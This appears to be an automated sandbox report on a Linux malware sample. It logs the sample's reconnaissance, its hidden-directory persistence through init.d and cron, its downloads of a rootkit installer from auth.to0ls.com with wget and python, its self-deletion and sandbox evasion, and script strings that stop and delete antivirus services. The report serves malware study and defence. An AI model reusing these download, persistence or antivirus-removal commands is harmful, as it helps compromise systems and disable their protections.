Source: /bin/bash (PID: 19709)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 19710)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 19749)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 19750)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 19764)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 19765)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 19797)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 19798)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 19828)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 19829)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 19864)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 19865)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 19884)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 19885)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 19916)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 19917)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 19949)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 19950)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 19981)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 19982)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20016)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20017)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20050)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20051)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20082)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20083)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20114)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20115)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20148)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20149)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20179)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20180)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20211)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20212)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20226)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20227)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20257)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20258)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20281)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20282)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20313)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20314)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20333)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20337)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20366)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20367)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20401)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20402)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20435)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20436)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20463)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20464)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20481)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20482)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20516)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20517)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20551)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20552)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20565)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20566)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20600)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20601)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20625)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20626)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20647)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20648)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20680)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20681)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20716)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20717)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20727)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20728)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20760)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20761)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20782)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20783)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20816)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20817)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20830)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20831)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20865)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20866)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20900)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20901)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20933)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20934)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20953)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20954)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20988)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20989)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21000)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21001)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21033)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21034)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21058)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21059)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21072)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21073)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21111)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21112)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21125)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21126)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21165)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21166)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21197)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21198)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21216)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21217)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21229)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21230)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21253)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21254)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21282)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21283)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21313)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21314)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21354)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21355)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21389)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21390)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21420)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21421)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21436)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21437)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21468)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21469)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21489)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21490)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21512)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21513)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21545)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21546)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21582)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21583)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21613)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21614)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21646)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21647)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21669)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21670)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21696)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21697)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/sh (PID: 21723)Grep executable: /bin/grep -> grep -v ,
Source: /bin/sh (PID: 21794)Grep executable: /bin/grep -> grep ,
Source: /bin/sh (PID: 21801)Grep executable: /bin/grep -> grep ,
Source: /bin/sh (PID: 21816)Grep executable: /bin/grep -> grep -o [0-9]\\{1,3\\}\\.[0-9]\\{1,3\\}\\.[0-9]\\{1,3\\}\\.[0-9]\\{1,3\\}
Source: /bin/sh (PID: 21832)Grep executable: /bin/grep -> grep -o [0-9]\\{1,3\\}\\.[0-9]\\{1,3\\}\\.[0-9]\\{1,3\\}\\.[0-9]\\{1,3\\}
Source: /bin/sh (PID: 21843)Grep executable: /bin/grep -> grep ssh
Source: /bin/sh (PID: 21845)Grep executable: /bin/grep -> grep -v -
Source: /bin/sh (PID: 21846)Grep executable: /bin/grep -> grep -v /
Source: /bin/sh (PID: 21866)Grep executable: /bin/grep -> grep ssh
Source: /bin/sh (PID: 21868)Grep executable: /bin/grep -> grep -v -
Source: /bin/sh (PID: 21869)Grep executable: /bin/grep -> grep -v /
Source: /bin/sh (PID: 21887)Grep executable: /bin/grep -> grep ssh
Source: /bin/sh (PID: 21889)Grep executable: /bin/grep -> grep -v -
Source: /bin/sh (PID: 21890)Grep executable: /bin/grep -> grep -v /
Source: /bin/sh (PID: 21909)Grep executable: /bin/grep -> grep ssh
Source: /bin/sh (PID: 21911)Grep executable: /bin/grep -> grep -v -
Source: /bin/sh (PID: 21912)Grep executable: /bin/grep -> grep -v /
Source: /bin/sh (PID: 21930)Grep executable: /bin/grep -> grep -v 127.0.0.1
Source: /bin/sh (PID: 21931)Grep executable: /bin/grep -> grep -v localhost
Source: /bin/bash (PID: 22249)Grep executable: /bin/grep -> grep /usr/lib/.../diskmanagerd
Source: /bin/bash (PID: 22250)Grep executable: /bin/grep -> grep -v grep
Source: /bin/bash (PID: 22539)Grep executable: /bin/grep -> grep /etc/cron.hourly/gcc4lef.sh
Source: /bin/bash (PID: 22541)Grep executable: /bin/grep -> grep -v grep
Source: /bin/bash (PID: 22612)Grep executable: /bin/grep -> grep c04dceb4c769b2c8823cbf39f3055e6d
Source: /bin/bash (PID: 22650)Grep executable: /bin/grep -> grep ad593f6a17598bdd12fd3bd0f3b2a925
Source: /bin/bash (PID: 23709)Grep executable: /bin/grep -> grep -ao ver= /tmp/vxbkyxrlq2hly2s
Source: /bin/bash (PID: 23737)Grep executable: /bin/grep -> grep -ao ver= /tmp/vxbkyxrlq2hly2s
Source: /bin/bash (PID: 23764)Grep executable: /bin/grep -> grep -ao ver= /tmp/vxbkyxrlq2hly2s
Source: /bin/bash (PID: 23793)Grep executable: /bin/grep -> grep Content-Length:
Source: /bin/bash (PID: 23796)Grep executable: /bin/grep -> grep Content-Length:
Source: /bin/bash (PID: 23799)Grep executable: /bin/grep -> grep Content-Length:
Source: /bin/bash (PID: 23805)Grep executable: /bin/grep -> grep Content-Length:
Source: /bin/bash (PID: 23819)Grep executable: /bin/grep -> grep Content-Length:
Source: /bin/bash (PID: 23845)Grep executable: /bin/grep -> grep Content-Length:
Source: /bin/bash (PID: 23857)Grep executable: /bin/grep -> grep Content-Length:
Source: /bin/bash (PID: 23868)Grep executable: /bin/grep -> grep Content-Length:
Source: /bin/bash (PID: 23876)Grep executable: /bin/grep -> grep Content-Length:
Source: /bin/bash (PID: 23893)Grep executable: /bin/grep -> grep -ao ver= /tmp/vxbkyxrlq2hly2s
Source: /bin/bash (PID: 23900)Grep executable: /bin/grep -> grep -ao ver=1.0 /tmp/vxbkyxrlq2hly2s
Source: /bin/bash (PID: 23927)Grep executable: /bin/grep -> grep /usr/lib/.../kacpi_notify
Source: /bin/bash (PID: 23948)Grep executable: /bin/grep -> grep /usr/lib/.../kacpi_notify
Source: /bin/bash (PID: 23954)Grep executable: /bin/grep -> grep /usr/lib/.../kacpi_notify
Source: /bin/bash (PID: 23986)Grep executable: /bin/grep -> grep /usr/lib/.../kacpi_notify
Source: /bin/bash (PID: 23989)Grep executable: /bin/grep -> grep /usr/lib/.../kacpi_notify
Source: /bin/bash (PID: 23995)Grep executable: /bin/grep -> grep /usr/lib/.../kacpi_notify
Source: /bin/bash (PID: 24037)Grep executable: /bin/grep -> grep /usr/lib/.../kacpi_notify
Source: /bin/bash (PID: 24045)Grep executable: /bin/grep -> grep /usr/lib/.../kacpi_notify
Source: /bin/bash (PID: 24079)Grep executable: /bin/grep -> grep /usr/lib/.../kacpi_notify
Source: /bin/bash (PID: 24090)Grep executable: /bin/grep -> grep /usr/lib/.../kacpi_notify
Source: /bin/bash (PID: 24119)Grep executable: /bin/grep -> grep /usr/lib/.../kacpi_notify
Source: /bin/bash (PID: 24127)Grep executable: /bin/grep -> grep /usr/lib/.../kacpi_notify
Source: /bin/bash (PID: 24156)Grep executable: /bin/grep -> grep /usr/lib/.../kacpi_notify
Source: /bin/bash (PID: 24174)Grep executable: /bin/grep -> grep /usr/lib/.../kacpi_notify
Source: /bin/bash (PID: 24195)Grep executable: /bin/grep -> grep /usr/lib/.../kacpi_notify
Source: /bin/bash (PID: 24198)Grep executable: /bin/grep -> grep /usr/lib/.../kacpi_notify
Source: /bin/bash (PID: 24212)Grep executable: /bin/grep -> grep /usr/lib/.../kacpi_notify
Executes the "mkdir" command used to create foldersShow sources
Source: /bin/bash (PID: 19367)Mkdir executable: /bin/mkdir -> mkdir -p /usr/lib/... -m 0777
Source: /bin/bash (PID: 19495)Mkdir executable: /bin/mkdir -> mkdir -p /usr/lib/... -m 0777
Source: /bin/bash (PID: 22550)Mkdir executable: /bin/mkdir -> mkdir -p /tmp/... -m 0777
Source: /tmp/.../install.sh (PID: 23617)Mkdir executable: /bin/mkdir -> mkdir -p /usr/include/... -m 0777
Executes the "nohup" (no hangup) command used to avoid background terminal process from being killedShow sources
Source: /bin/bash (PID: 19422)Nohup executable: /usr/bin/nohup -> nohup /bin/bash diskmanagerd /sbin/init
Source: /bin/bash (PID: 21716)Nohup executable: /usr/bin/nohup -> nohup /tmp/.helpdd
Executes the "ping" command used for connectivity testing via ICMPShow sources
Source: /bin/bash (PID: 19340)Ping executable: /bin/ping -> ping auth.to0ls.com -c1
Source: /bin/bash (PID: 19467)Ping executable: /bin/ping -> ping auth.to0ls.com -c1
Executes the "python" command used to interpret Python scriptsShow sources
Source: /bin/bash (PID: 23739)Python executable: /usr/bin/python -> python -c "import urllib;urllib.urlretrieve('http://auth.to0ls.com/l/ver.txt', '/tmp/vxbkyxrlq2hly2s')"
Executes the "rm" command used to delete files or directoriesShow sources
Source: /bin/bash (PID: 19406)Rm executable: /bin/rm -> rm -f /usr/lib/.../diskmanagerd
Source: /bin/bash (PID: 19418)Rm executable: /bin/rm -> rm -f /tmp/1EC6U55yrZ
Source: /bin/bash (PID: 21703)Rm executable: /bin/rm -> rm -f /tmp/.h
Source: /bin/sh (PID: 21950)Rm executable: /bin/rm -> rm -rf /tmp/.hh
Source: /bin/bash (PID: 22136)Rm executable: /bin/rm -> rm -f /tmp/.helpdd
Source: /bin/bash (PID: 22560)Rm executable: /bin/rm -> rm -f /tmp/.../brootkit.sh
Source: /bin/bash (PID: 22613)Rm executable: /bin/rm -> rm -f /tmp/.../install.sh
Source: /bin/bash (PID: 23682)Rm executable: /bin/rm -> rm -rf /tmp/.../
Source: /bin/bash (PID: 23683)Rm executable: /bin/rm -> rm -f /tmp/vxbkyxrlq2hly2s
Source: /bin/bash (PID: 23710)Rm executable: /bin/rm -> rm -f /tmp/vxbkyxrlq2hly2s
Source: /bin/bash (PID: 23738)Rm executable: /bin/rm -> rm -f /tmp/vxbkyxrlq2hly2s
Source: /bin/bash (PID: 23765)Rm executable: /bin/rm -> rm -f /tmp/vxbkyxrlq2hly2s
Source: /bin/bash (PID: 23914)Rm executable: /bin/rm -> rm -f /tmp/vxbkyxrlq2hly2s
Source: /tmp/.../install.sh (PID: 23645)Rm executable: /bin/rm -> rm -f brootkit.sh
Source: /tmp/.../install.sh (PID: 23648)Rm executable: /bin/rm -> rm -f /tmp/.../install.sh
Executes the "systemctl" command used for controlling the systemd system and service managerShow sources
Source: /usr/sbin/update-rc.d (PID: 22389)Systemctl executable: /bin/systemctl -> systemctl daemon-reload
Executes the "touch" command used to create files or modify time stampsShow sources
Source: /bin/bash (PID: 23782)Touch executable: /usr/bin/touch -> touch /tmp/vxbkyxrlq2hly2s
Executes the "wget" command typically used for HTTP/S downloadingShow sources
Source: /bin/bash (PID: 22572)Wget executable: /usr/bin/wget -> wget -O /tmp/.../brootkit.sh http://auth.to0ls.com/l/tiktoor/brootkit.sh
Source: /bin/bash (PID: 22614)Wget executable: /usr/bin/wget -> wget -O /tmp/.../install.sh http://auth.to0ls.com/l/tiktoor/install.sh
Source: /bin/bash (PID: 23684)Wget executable: /usr/bin/wget -> wget -O /tmp/vxbkyxrlq2hly2s http://auth.to0ls.com/l/ver.txt
Sample tries to set the executable flagShow sources
Source: /bin/mkdir (PID: 19367)File: /usr/lib/... (bits: - usr: rwx grp: rwx all: rwx)
Source: /bin/chmod (PID: 19368)File: /usr/lib/... (bits: - usr: rwx grp: rwx all: rwx)
Source: /bin/chmod (PID: 19413)File: /usr/lib/.../diskmanagerd (bits: - usr: rx grp: rx all: rwx)
Source: /bin/chmod (PID: 19496)File: /usr/lib/... (bits: - usr: rwx grp: rwx all: rwx)
Source: /bin/chmod (PID: 21709)File: /tmp/.helpdd (bits: - usr: rx grp: rx all: rwx)
Source: /bin/chmod (PID: 22267)File: /etc/init.d/diskmanagerd (bits: - usr: rx grp: rx all: rwx)
Source: /bin/chmod (PID: 22536)File: /etc/cron.hourly/gcc4lef.sh (bits: - usr: rx grp: rx all: rwx)
Source: /bin/mkdir (PID: 22550)File: /tmp/... (bits: - usr: rwx grp: rwx all: rwx)
Source: /bin/chmod (PID: 22554)File: /tmp/... (bits: - usr: rwx grp: rwx all: rwx)
Source: /bin/chmod (PID: 22651)File: /tmp/.../brootkit.sh (bits: - usr: rx grp: rx all: rwx)
Source: /bin/chmod (PID: 22652)File: /tmp/.../install.sh (bits: - usr: rx grp: rx all: rwx)
Source: /bin/mkdir (PID: 23617)File: /usr/include/... (bits: - usr: rwx grp: rwx all: rwx)
Source: /bin/chmod (PID: 23638)File: /usr/include/... (bits: - usr: rwx grp: rwx all: rwx)
Writes shell script file to disk with an unusual file extensionShow sources
Source: /bin/cp (PID: 19407)Writes shell script file to disk with an unusual file extension: /usr/lib/.../diskmanagerdJump to dropped file
Source: /bin/bash (PID: 19422)Writes shell script file to disk with an unusual file extension: /etc/init.d/diskmanagerdJump to dropped file
Source: /bin/cp (PID: 22527)Writes shell script file to disk with an unusual file extension: /lib/libterminfo.soJump to dropped file
Writes shell script files to diskShow sources
Source: /bin/bash (PID: 19422)Shell script file created: /etc/cron.hourly/gcc4lef.shJump to dropped file
Source: /usr/bin/wget (PID: 22572)Shell script file created: /tmp/.../brootkit.shJump to dropped file
Source: /usr/bin/wget (PID: 22614)Shell script file created: /tmp/.../install.shJump to dropped file
Source: /bin/cp (PID: 23621)Shell script file created: /usr/include/.../brootkit.shJump to dropped file
Source: /bin/cp (PID: 23641)Shell script file created: /etc/profile.d/emacs.shJump to dropped file
Executes the "awk" command used to scan for patterns (typically in standard output)Show sources
Source: /bin/bash (PID: 19342)Awk executable: /usr/bin/awk -> awk "{ print $3 }"
Source: /bin/bash (PID: 19469)Awk executable: /usr/bin/awk -> awk "{ print $3 }"
Source: /bin/sh (PID: 21724)Awk executable: /usr/bin/awk -> awk "{print $1}"
Source: /bin/sh (PID: 21795)Awk executable: /usr/bin/awk -> awk -F, "{print $1}"
Source: /bin/sh (PID: 21802)Awk executable: /usr/bin/awk -> awk -F, "{print $1}"
Source: /bin/sh (PID: 21844)Awk executable: /usr/bin/awk -> awk "{print $2}"
Source: /bin/sh (PID: 21867)Awk executable: /usr/bin/awk -> awk "{print $3}"
Source: /bin/sh (PID: 21888)Awk executable: /usr/bin/awk -> awk "{print $2}"
Source: /bin/sh (PID: 21910)Awk executable: /usr/bin/awk -> awk "{print $3}"

Hooking and other Techniques for Hiding and Protection:

barindex
Drops files in suspicious directoriesShow sources
Source: /bin/bash (PID: 19422)File: /etc/init.d/diskmanagerdJump to dropped file
Source: /usr/lib/insserv/insserv (PID: 22367)File: /etc/init.d/.depend.bootJump to dropped file
Source: /usr/lib/insserv/insserv (PID: 22367)File: /etc/init.d/.depend.startJump to dropped file
Source: /usr/lib/insserv/insserv (PID: 22367)File: /etc/init.d/.depend.stopJump to dropped file
Sample deletes itselfShow sources
Source: /bin/rm (PID: 19418)File: /tmp/1EC6U55yrZ
Source: /bin/rm (PID: 22613)File: /tmp/.../install.sh
Source: /bin/rm (PID: 23648)File: /tmp/.../install.sh

Malware Analysis System Evasion:

barindex
Executes the "sleep" command used to delay execution and potentially evade sandboxesShow sources
Source: /bin/bash (PID: 21717)Sleep executable: /bin/sleep -> sleep 5
Source: /bin/bash (PID: 22655)Sleep executable: /bin/sleep -> sleep 5
Uses the "uname" system call to query kernel version information (possible evasion)Show sources
Source: /bin/bash (PID: 19326)Queries kernel information via 'uname':
Source: /bin/ping (PID: 19340)Queries kernel information via 'uname':
Source: /bin/bash (PID: 19422)Queries kernel information via 'uname':
Source: /bin/ping (PID: 19467)Queries kernel information via 'uname':
Source: /usr/bin/wget (PID: 22572)Queries kernel information via 'uname':
Source: /usr/bin/wget (PID: 22614)Queries kernel information via 'uname':
Source: /usr/bin/wget (PID: 23684)Queries kernel information via 'uname':
Source: /usr/bin/curl (PID: 23711)Queries kernel information via 'uname':
Source: /usr/bin/python (PID: 23739)Queries kernel information via 'uname':
Source: /usr/bin/ssh (PID: 21967)Queries kernel information via 'uname':
Source: /usr/bin/ssh (PID: 21973)Queries kernel information via 'uname':
Source: /usr/bin/ssh (PID: 21982)Queries kernel information via 'uname':
Source: /lib/systemd/system-generators/systemd-gpt-auto-generator (PID: 22426)Queries kernel information via 'uname':
Source: /lib/systemd/system-generators/lvm2-activation-generator (PID: 22427)Queries kernel information via 'uname':
Source: /tmp/.../install.sh (PID: 22654)Queries kernel information via 'uname':

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Sample contains AV-related stringsShow sources
Source: 1EC6U55yrZsafedog: ServiceNameArray=("safedog" "aegis" "yunsuo" "clamd" "avast" "avgd" "cmdavd" "cmdmgd" "drweb-configd" "drweb-spider-kmod" "esets" "xmirrord")
Source: 1EC6U55yrZaegis: ServiceNameArray=("safedog" "aegis" "yunsuo" "clamd" "avast" "avgd" "cmdavd" "cmdmgd" "drweb-configd" "drweb-spider-kmod" "esets" "xmirrord")
Source: 1EC6U55yrZyunsuo: ServiceNameArray=("safedog" "aegis" "yunsuo" "clamd" "avast" "avgd" "cmdavd" "cmdmgd" "drweb-configd" "drweb-spider-kmod" "esets" "xmirrord")
Source: 1EC6U55yrZclamd: ServiceNameArray=("safedog" "aegis" "yunsuo" "clamd" "avast" "avgd" "cmdavd" "cmdmgd" "drweb-configd" "drweb-spider-kmod" "esets" "xmirrord")
Source: 1EC6U55yrZavast: ServiceNameArray=("safedog" "aegis" "yunsuo" "clamd" "avast" "avgd" "cmdavd" "cmdmgd" "drweb-configd" "drweb-spider-kmod" "esets" "xmirrord")
Source: 1EC6U55yrZavgd: ServiceNameArray=("safedog" "aegis" "yunsuo" "clamd" "avast" "avgd" "cmdavd" "cmdmgd" "drweb-configd" "drweb-spider-kmod" "esets" "xmirrord")
Source: 1EC6U55yrZcmdavd: ServiceNameArray=("safedog" "aegis" "yunsuo" "clamd" "avast" "avgd" "cmdavd" "cmdmgd" "drweb-configd" "drweb-spider-kmod" "esets" "xmirrord")
Source: 1EC6U55yrZcmdmgd: ServiceNameArray=("safedog" "aegis" "yunsuo" "clamd" "avast" "avgd" "cmdavd" "cmdmgd" "drweb-configd" "drweb-spider-kmod" "esets" "xmirrord")
Source: 1EC6U55yrZdrweb-configd: ServiceNameArray=("safedog" "aegis" "yunsuo" "clamd" "avast" "avgd" "cmdavd" "cmdmgd" "drweb-configd" "drweb-spider-kmod" "esets" "xmirrord")
Source: 1EC6U55yrZdrweb-spider-kmod: ServiceNameArray=("safedog" "aegis" "yunsuo" "clamd" "avast" "avgd" "cmdavd" "cmdmgd" "drweb-configd" "drweb-spider-kmod" "esets" "xmirrord")
Source: 1EC6U55yrZesets: ServiceNameArray=("safedog" "aegis" "yunsuo" "clamd" "avast" "avgd" "cmdavd" "cmdmgd" "drweb-configd" "drweb-spider-kmod" "esets" "xmirrord")
Source: 1EC6U55yrZxmirrord: ServiceNameArray=("safedog" "aegis" "yunsuo" "clamd" "avast" "avgd" "cmdavd" "cmdmgd" "drweb-configd" "drweb-spider-kmod" "esets" "xmirrord")
Source: 1EC6U55yrZsafedog: "safedog" )
Source: 1EC6U55yrZsafedog: service safedog stop >/dev/null 2>&1
Source: 1EC6U55yrZsafedog: rm -f /etc/init.d/safedog >/dev/null 2>&1
Source: 1EC6U55yrZsafedog: rm -f /usr/bin/safedog_uninstall >/dev/null 2>&1
Source: 1EC6U55yrZsafedog: rm -rf /usr/bin/safedog >/dev/null 2>&1
Source: 1EC6U55yrZsafedog: rm -rf /etc/safedog >/dev/null 2>&1
Source: 1EC6U55yrZsafedog: rm -rf /etc/safedog/libs/safedog >/dev/null 2>&1
Source: 1EC6U55yrZsafedog: rm -rf /etc/safedog/libs/sdcommon >/dev/null 2>&1
Source: 1EC6U55yrZsafedog: rm -rf /etc/safedog/libs/sdcc >/dev/null 2>&1
Source: 1EC6U55yrZsafedog: rm -rf /etc/safedog/sdcc/bin/sdcc >/dev/null 2>&1
Source: 1EC6U55yrZsafedog: rm -rf /etc/safedog/sdcc/script/runsdcc >/dev/null 2>&1
Source: 1EC6U55yrZsafedog: rm -rf /etc/safedog/sdcc/script/sdccboot >/dev/null 2>&1
Source: 1EC6U55yrZsafedog: rm -rf /etc/safedog/logs/sdcc.log >/dev/null 2>&1
Source: 1EC6U55yrZsafedog: rm -f /etc/safedog/sdcc/script/udboot >/dev/null 2>&1
Source: 1EC6U55yrZsafedog: rm -f /etc/safedog/sdcc/bin/udcenter >/dev/null 2>&1
Source: 1EC6U55yrZsafedog: rm -f /etc/safedog/sdcc/bin/udpro >/dev/null 2>&1
Source: 1EC6U55yrZsafedog: rm -f /etc/safedog/sdcc/bin/sdalarm >/dev/null 2>&1
Source: 1EC6U55yrZsafedog: rm -f /etc/safedog/server/script/sdsetos >/dev/null 2>&1
Source: 1EC6U55yrZsafedog: rm -f /etc/safedog/script/safedog_uninstall >/dev/null 2>&1
Source: 1EC6U55yrZaegis: "aegis" )
Source: 1EC6U55yrZaegis: killall -9 aegis_cli >/dev/null 2>&1
Source: 1EC6U55yrZaegis: killall -9 aegis_update >/dev/null 2>&1
Source: 1EC6U55yrZaegis: /etc/init.d/aegis stop >/dev/null 2>&1
Source: 1EC6U55yrZaegis: /etc/init.d/aegis uninstall >/dev/null 2>&1
Source: 1EC6U55yrZaegis: rm -f /etc/init.d/aegis
Source: 1EC6U55yrZaegis: rc-update del aegis default 2>/dev/null
